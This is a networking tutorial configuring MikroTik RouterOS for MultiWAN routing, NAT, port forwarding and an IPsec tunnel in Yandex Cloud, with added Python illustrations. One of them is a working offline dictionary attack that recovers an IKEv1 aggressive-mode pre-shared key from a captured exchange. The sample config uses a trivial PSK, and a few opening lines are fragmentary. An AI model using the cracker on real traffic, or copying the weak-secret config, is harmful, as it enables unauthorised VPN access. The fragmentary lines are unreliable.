Yandex Cloud and MikroTik MultiWAN

Greetings, readers. In this article I would like to share my experience of setting up an internal network in Yandex Cloud and routing it to the Internet through MikroTik RouterOS.



There is a VPC that is administered by internal cloud services and hands out internal and external IPs to VMs through a subnet gateway sitting behind NAT, which is not very convenient for centralised administration.



The layout of the internal network, and how an external IP is obtained in Yandex Cloud, looks like this:





ip NAT-instance forward, . / ( VPC Preview).



, IP VPC1













The subnets, one pair per availability zone (a, b, c):



Internal1-a – 10.1.0.0/24
Internal2-a – 10.1.1.0/24
Internal1-b – 10.1.2.0/24
Internal2-b – 10.1.3.0/24
Internal1-c – 10.1.4.0/24
Internal2-c – 10.1.5.0/24


In every subnet the cloud reserves the first addresses for itself:



Gateway – X.X.X.1
Internal DNS – X.X.X.2


Next, the RouterOS instance.



The router is created from the Cloud Marketplace -> Cloud Hosted Router image, with two network interfaces and a static IP in each of the two a-zone subnets.



RouterOS interface addresses:
Ether1 – 10.1.0.254
Ether2 – 10.1.1.254


Connect to ether1 with WinBox; the admin user authenticates with the RSA public key supplied when the instance was created.



All configuration below is done from the CLI (a terminal window in WinBox). First, look at the routes RouterOS already has:






/ip route print 
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip,
 b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit 
 #      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 ADS  0.0.0.0/0                          10.1.0.1                  1
 1 ADC  10.1.1.0/24        10.1.1.254      ether2                    0
 2 ADC  10.1.0.0/24        10.1.0.254      ether1                    0


The default route goes out through ether1 to the subnet gateway 10.1.0.1, which is the cloud NAT gateway to the Internet; the second interface has a connected route only.



There are two interfaces and two gateways, so a second default route with distance 2 is added as a backup, plus static routes to the subnets of the other zones:





/ip route
add dst-address=0.0.0.0/0 gateway=10.1.1.1 distance=2 
add dst-address=10.1.2.0/24 gateway=10.1.0.1 distance=1  
add dst-address=10.1.3.0/24 gateway=10.1.1.1 distance=1  
add dst-address=10.1.5.0/24 gateway=10.1.1.1 distance=1  
add dst-address=10.1.4.0/24 gateway=10.1.0.1 distance=1 


The b and c zone subnets are reached through the a zone gateways: Internal1-b/c via 10.1.0.1, Internal2-b/c via 10.1.1.1.



Now the firewall. The input chain first: accept connections to the router itself from every internal subnet:





/ip firewall filter
add chain=input action=accept src-address=10.1.5.0/24 
add chain=input action=accept src-address=10.1.1.0/24 
add chain=input action=accept src-address=10.1.3.0/24 
add chain=input action=accept src-address=10.1.2.0/24 
add chain=input action=accept src-address=10.1.0.0/24 
add chain=input action=accept src-address=10.1.4.0/24 


And ICMP, so that ping works:



/ip firewall filter
add chain=input action=accept protocol=icmp 



Forward rules, one per subnet, letting each subnet out to the Internet. Note that no drop rule is ever added to the forward chain, so the forward chain stays wide open (including for the port forwards below); add a final drop to forward if you want these accepts to mean anything:

/ip firewall filter
add chain=forward action=accept src-address=10.1.5.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.1.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.3.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.2.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.0.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.4.0/24 \
dst-address=0.0.0.0/0 




Finally, drop everything else that arrives at the router itself. This rule must be the last one in the input chain; any accept rule added below it later (without place-before) will never be reached:

/ip firewall filter add chain=input action=drop log=no




If the drop rule ended up above the accept rules, move it to the end:

/ip firewall filter move numbers="[old rule no]" \
destination="[new rule no]"




Check the resulting order:

/ip firewall filter print


Now the external IPs and MultiWAN. The MultiWAN setup follows the MikroTik wiki MultiWAN article (see Sources).



To send each WAN through its own gateway we use route rules and two interface lists:



/interface list
add name="WAN1"
add name="WAN2"

/interface list member
add list=WAN1 interface=ether1 dynamic=no 
add list=WAN2 interface=ether2 dynamic=no




A default route in a separate routing table for each WAN (the routing-mark creates the table):

/ip route
add dst-address=0.0.0.0/0 gateway=10.1.0.1 distance=1 routing-mark=WAN1 
add dst-address=0.0.0.0/0 gateway=10.1.1.1 distance=1 routing-mark=WAN2 


Traffic between the internal subnets must stay in the main table, everything else keeps using ether1 (the main table's default), and only the subnets bound to the second gateway are forced into the WAN2 table. The first rule is essential: lookup-only-in-table never falls back to main, so without it a host in 10.1.3.0/24 would reach 10.1.0.0/24 only via the WAN2 default gateway.





/ip route rule
add src-address=10.1.0.0/16 dst-address=10.1.0.0/16 action=lookup-only-in-table table=main
add src-address=10.1.3.0/24 action=lookup-only-in-table table=WAN2 
add src-address=10.1.5.0/24 action=lookup-only-in-table table=WAN2
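The lookup order those rules produce, as an added example that is not part of the original article: a small Python model of RouterOS policy routing (route rules evaluated top to bottom, then longest-prefix match inside the chosen table, main table if no rule matches). Tables, rules and gateways are the ones from the configuration above; the packets passed to route() are constructed test inputs, and the distance-2 backup default is left out because it is inactive while the first one is up.

```python
# Added example, not part of the original article: a model of the RouterOS
# lookup order behind the MultiWAN rules above, to show which gateway a
# packet leaves through.  Tables, rules and gateways are the ones from the
# configuration; the packets fed to route() are constructed test inputs.
from ipaddress import ip_address, ip_network

# Routing tables as (destination prefix, gateway or connected interface).
# Only active routes are modelled; the distance-2 backup default is omitted.
TABLES = {
    "main": [
        ("0.0.0.0/0", "10.1.0.1"),    # default via the ether1 gateway
        ("10.1.0.0/24", "ether1"),    # connected
        ("10.1.1.0/24", "ether2"),    # connected
        ("10.1.2.0/24", "10.1.0.1"),
        ("10.1.3.0/24", "10.1.1.1"),
        ("10.1.4.0/24", "10.1.0.1"),
        ("10.1.5.0/24", "10.1.1.1"),
    ],
    "WAN1": [("0.0.0.0/0", "10.1.0.1")],   # routing-mark=WAN1
    "WAN2": [("0.0.0.0/0", "10.1.1.1")],   # routing-mark=WAN2
}

# /ip route rule entries in order: (src prefix, dst prefix, table).
# None means the rule does not restrict that field.
RULES = [
    ("10.1.0.0/16", "10.1.0.0/16", "main"),   # keep intra-VPC traffic in main
    ("10.1.3.0/24", None, "WAN2"),
    ("10.1.5.0/24", None, "WAN2"),
]


def select_table(src, dst, rules=RULES):
    """First matching rule wins (lookup-only-in-table); otherwise main."""
    s, d = ip_address(src), ip_address(dst)
    for rule_src, rule_dst, table in rules:
        if rule_src is not None and s not in ip_network(rule_src):
            continue
        if rule_dst is not None and d not in ip_network(rule_dst):
            continue
        return table
    return "main"


def lookup(table, dst):
    """Longest-prefix match inside one table; None if the table has no route
    (with lookup-only-in-table the packet is then dropped, not re-looked-up)."""
    d = ip_address(dst)
    best = None
    for prefix, gw in TABLES[table]:
        net = ip_network(prefix)
        if d in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gw)
    return best[1] if best else None


def route(src, dst, rules=RULES):
    """Return (table used, next hop) for a packet from src to dst."""
    table = select_table(src, dst, rules)
    return table, lookup(table, dst)


if __name__ == "__main__":
    for src, dst in [("10.1.3.10", "8.8.8.8"), ("10.1.2.10", "8.8.8.8"),
                     ("10.1.3.10", "10.1.0.5")]:
        print(src, "->", dst, route(src, dst))
    # Without the first rule, 10.1.3.0/24 hosts would reach 10.1.0.0/24 only
    # via the WAN2 default gateway, never the connected route on ether1:
    print("no intra-VPC rule:", route("10.1.3.10", "10.1.0.5", rules=RULES[1:]))
```

Running route() with RULES[1:] shows why the intra-VPC rule sits first: hosts in the WAN2-bound subnets would otherwise be handed to 10.1.1.1 even for neighbours on ether1.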


In the cloud, two external IP addresses are then needed, one per router interface.



Route tables in the cloud console:

Virtual Private Cloud -> Route tables -> create a table (NAT) -> add a static route: Destination 0.0.0.0/0, Next hop: 10.1.0.1/10.1.1.1 -> bind the table to the subnets.

For services that must be reachable from outside (e.g. the kubernetes API) and for IPsec, two more routes are added:



 Destination: 10.1.0.0/16, Next hop: 10.1.0.1/10.1.1.1
 Destination: <_>, Next hop: 10.1.0.1/10.1.1.1


Finally, so that the VMs reach the Internet with the external IPs, srcnat with masquerade. Traffic between the internal subnets is exempted first (the accept rule must stay above the masquerade rules, since srcnat is first-match):



/ip firewall nat
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.1.0.0/16
add chain=srcnat action=masquerade src-address=10.1.0.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.1.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.2.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.3.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.4.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.5.0/24 dst-address=0.0.0.0/0


Each subnet now leaves through the external IP of the interface its table points at.



Port forwarding:





Forwarding a port from an external IP to an internal host, restricted to one source address (match on dst-port rather than port, or a packet whose source port happens to be 10055 would be redirected too):



/ip firewall nat
add chain=dstnat action=netmap to-addresses=10.1.5.20 \
to-ports=10050 protocol=tcp src-address=7.7.7.1 in-interface-list=WAN2 dst-port=10055 
add chain=dstnat action=netmap to-addresses=10.1.0.5 \
to-ports=3306 protocol=tcp src-address=7.7.7.2 in-interface-list=WAN1 dst-port=11050


7.7.7.1/7.7.7.2 are placeholders for the external IPs of the hosts allowed to connect.



Now IPsec to the office, so that the cloud network and the office network can reach each other.



UPD: IPsec



The tunnel is terminated on ether2, i.e. on the second cloud external IP (the one 10.1.1.254 is mapped to).



Authentication is by PSK. Because the cloud external IP is a 1:1 NAT address, the office MikroTik sees a peer address different from the local interface address, so the identity announces the external IP as my-id. local-address is the interface address 10.1.1.254 (the same address the policy uses as sa-src-address). Two caveats a practitioner should weigh: aggressive mode with a PSK lets anyone who captures a single IKE exchange test key guesses offline (the responder's hash is sent in the clear), so the secret must be long and random, never a value like 123123123, or the profile should use exchange-mode=ike2 instead; and the cipher must be AES-256 in both the profile and the proposal (des is a 56-bit key and is not acceptable), with the office side configured identically. nat-traversal=no only works because the cloud's 1:1 NAT passes ESP unchanged; with nat-traversal=yes you would also have to accept udp/4500 in the input chain.



/ip ipsec profile
add name="office" hash-algorithm=sha512 enc-algorithm=aes-256 dh-group=modp1536 \
lifetime=8h proposal-check=obey nat-traversal=no \
dpd-interval=2m dpd-maximum-failures=5

/ip ipsec peer
add name="peer_office" address=9.9.9.1/32 local-address=10.1.1.254 \
profile=office exchange-mode=aggressive send-initial-contact=yes

/ip ipsec identity
add peer=peer_office auth-method=pre-shared-key notrack-chain="prerouting" \
secret="123123123" generate-policy=no policy-template-group=office \
my-id=address:<cloud_ext_ip_address>

/ip ipsec proposal
add name="office" auth-algorithms=sha256 \
enc-algorithms=aes-256-cbc lifetime=1h pfs-group=modp1536




/ip ipsec policy 
add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=10.7.0.0/16 \
dst-port=any protocol=all action=encrypt level=require ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office


If several office subnets sit behind the same peer, give each policy level=unique so that every one gets its own SA, for example for 12.1.0.0/24 and 12.10.0.0/24:



/ip ipsec policy 
add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=12.1.0.0/24 \
dst-port=any protocol=all action=encrypt level=unique ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office

add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=12.10.0.0/24 \
dst-port=any protocol=all action=encrypt level=unique ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office
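The offline attack that the aggressive-mode/PSK caveat above refers to, as an added example that is not part of the original article. In IKEv1 aggressive mode the responder's HASH_R travels unencrypted in the second message and every input to it is on the wire, so a captured exchange lets an attacker test PSK guesses without ever talking to the router. The formulas are those of RFC 2409 with prf = HMAC over the negotiated hash (sha512, as in the profile above); the exchange itself is constructed (random stand-ins for nonces, cookies and DH public values, a stub SA payload), not real IKE packets, and the wordlist is likewise made up.

```python
# Added example, not part of the original article: why the aggressive-mode
# PSK setup above needs a long random secret.  In IKEv1 aggressive mode the
# responder sends HASH_R unencrypted, and every input to it is on the wire
# (RFC 2409):
#     SKEYID = prf(PSK, Ni_b | Nr_b)
#     HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
# with prf = HMAC over the negotiated hash (sha512 in the profile above).
# Anyone who captured one exchange can test PSK guesses offline.  The
# exchange here is constructed: random stand-ins for nonces, cookies and DH
# public values, not real IKE packets.
import hmac
import os


def ikev1_hash_r(psk: bytes, ex: dict, hash_name: str = "sha512") -> bytes:
    """HASH_R exactly as the responder computes it and sends it in message 2."""
    skeyid = hmac.new(psk, ex["ni"] + ex["nr"], hash_name).digest()
    msg = (ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
           + ex["sai_b"] + ex["idir_b"])
    return hmac.new(skeyid, msg, hash_name).digest()


def make_exchange(responder_ip=(9, 9, 9, 1)) -> dict:
    """Constructed public values of one aggressive-mode exchange (all of
    these are visible to a passive observer of the UDP/500 traffic)."""
    idir_b = bytes([1, 0, 0, 0]) + bytes(responder_ip)   # ID_IPV4_ADDR body
    return {
        "ni": os.urandom(16), "nr": os.urandom(16),        # nonces
        "gxi": os.urandom(192), "gxr": os.urandom(192),    # modp1536 publics
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),    # ISAKMP cookies
        "sai_b": bytes.fromhex("00000001000000010000002c"),  # SA payload stub
        "idir_b": idir_b,
    }


def crack_psk(ex: dict, captured_hash_r: bytes, wordlist, hash_name="sha512"):
    """Offline dictionary attack: recompute HASH_R for every candidate PSK
    and compare with the captured value.  Returns the PSK or None."""
    for cand in wordlist:
        guess = ikev1_hash_r(cand.encode(), ex, hash_name)
        if hmac.compare_digest(guess, captured_hash_r):
            return cand
    return None


if __name__ == "__main__":
    ex = make_exchange()
    on_the_wire = ikev1_hash_r(b"123123123", ex)   # the page's placeholder PSK
    print(crack_psk(ex, on_the_wire, ["password", "mikrotik", "123123123"]))
```

A PSK drawn from a few dozen random bytes is out of reach of this search; a short or dictionary-like one falls to it at hash speed, which is the whole argument for a strong secret or for exchange-mode=ike2, where the authentication hash is never exposed this way.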


The matching firewall filter rules, the srcnat exemption (tunnel traffic must not be masqueraded, and srcnat runs before IPsec encryption, so the exemption has to sit above the masquerade rules), and raw rules. place-before=0 puts the new accepts at the top of their chains, above the input drop and the masquerade rules added earlier:



/ip firewall filter 
add chain=input action=accept src-address=10.7.0.0/16 place-before=0
add chain=input action=accept protocol=ipsec-esp src-address=9.9.9.1 place-before=0
add chain=input action=accept protocol=udp src-address=9.9.9.1 dst-port=500 place-before=0
add chain=forward action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16 
add chain=forward action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 

/ip firewall nat 
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 place-before=0
add chain=srcnat action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16 place-before=0

/ip firewall raw  
add chain=prerouting action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 
add chain=prerouting action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16
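Rule order is the thing most easily broken when these IPsec rules are pasted onto the firewall built earlier (the input drop and the masquerade rules are both first-match), so here is an added example, not part of the original article, that replays RouterOS add commands in order, honours place-before=0, and reports every accept rule that overlaps an earlier rule of a different action. The two configuration texts are constructed from the article's own commands (a subset, to keep it short): one with the IPsec rules simply appended, one with them placed first. Only src/dst address, protocol, dst-port and in-interface-list are compared; the parser is an assumption of this example, not a RouterOS tool.

```python
# Added example, not part of the original article: an order check for the
# RouterOS filter and NAT rules above.  Both chains are first-match, so an
# accept added after the catch-all input drop, or a srcnat accept added after
# the masquerade rules it is meant to exempt IPsec traffic from, never fires.
# The script replays `add` lines in order (honouring place-before=0) and
# reports every accept rule that overlaps an earlier rule of another action.
# The two configuration texts are constructed from the article's commands.
from ipaddress import ip_network
import shlex

MATCHERS = ("src-address", "dst-address", "protocol", "dst-port", "in-interface-list")


def parse(text):
    """Return {(menu, chain): [rule dicts]} in the order RouterOS would keep."""
    chains, menu = {}, None
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):           # e.g. "/ip firewall filter"
            menu = line
            continue
        parts = shlex.split(line)
        if parts[0] != "add":
            continue
        rule = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
        lst = chains.setdefault((menu, rule.get("chain")), [])
        if rule.pop("place-before", None) == "0":
            lst.insert(0, rule)            # place-before=0 puts the rule on top
        else:
            lst.append(rule)
    return chains


def overlaps(a, b):
    """True if some packet can match both rules (only MATCHERS are compared)."""
    for k in MATCHERS:
        if k in a and k in b:
            if k.endswith("-address"):
                if not ip_network(a[k]).overlaps(ip_network(b[k])):
                    return False
            elif a[k] != b[k]:
                return False
    return True


def shadowed(chains):
    """(menu, chain, index, earlier index) for each accept rule that sits
    below a non-accept rule it overlaps; the earlier rule wins first-match."""
    findings = []
    for (menu, chain), rules in chains.items():
        for i, rule in enumerate(rules):
            if rule.get("action") != "accept":
                continue
            for j in range(i):
                if rules[j].get("action") != "accept" and overlaps(rules[j], rule):
                    findings.append((menu, chain, i, j))
                    break
    return findings


# Constructed: the article's order, IPsec rules appended last.
ADDED_LAST = """
/ip firewall filter
add chain=input action=accept src-address=10.1.0.0/24
add chain=input action=accept src-address=10.1.1.0/24
add chain=input action=accept protocol=icmp
add chain=input action=drop log=no
add chain=input action=accept src-address=10.7.0.0/16
add chain=input action=accept protocol=ipsec-esp src-address=9.9.9.1
add chain=input action=accept protocol=udp src-address=9.9.9.1 dst-port=500
/ip firewall nat
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.1.0.0/16
add chain=srcnat action=masquerade src-address=10.1.0.0/24 dst-address=0.0.0.0/0
add chain=srcnat action=masquerade src-address=10.1.1.0/24 dst-address=0.0.0.0/0
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16
add chain=srcnat action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16
"""

# Constructed: the same rules, every IPsec-related one with place-before=0.
PLACED_FIRST = "\n".join(
    l + " place-before=0" if ("10.7.0.0/16" in l or "9.9.9.1" in l) else l
    for l in ADDED_LAST.splitlines())

if __name__ == "__main__":
    for label, cfg in (("appended", ADDED_LAST), ("place-before=0", PLACED_FIRST)):
        print(label, shadowed(parse(cfg)))
```

With the rules appended, the three IPsec input accepts are reported under the drop and the srcnat exemption under the first masquerade rule; with place-before=0 the report is empty.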


10.7.0.0/16 is the office network and 9.9.9.1 the office router's external IP; both are placeholders.






A MikroTik RouterOS CHR license must be purchased for the cloud router; without one the free license caps interface speed at 1 Mbit/s and carries functional restrictions:

https://wiki.mikrotik.com/wiki/Manual:License



Thank you for your attention!



Sources used:



MULTIWAN



UPD

Based on the comments and remarks, I have extended the article and added the IPsec description.



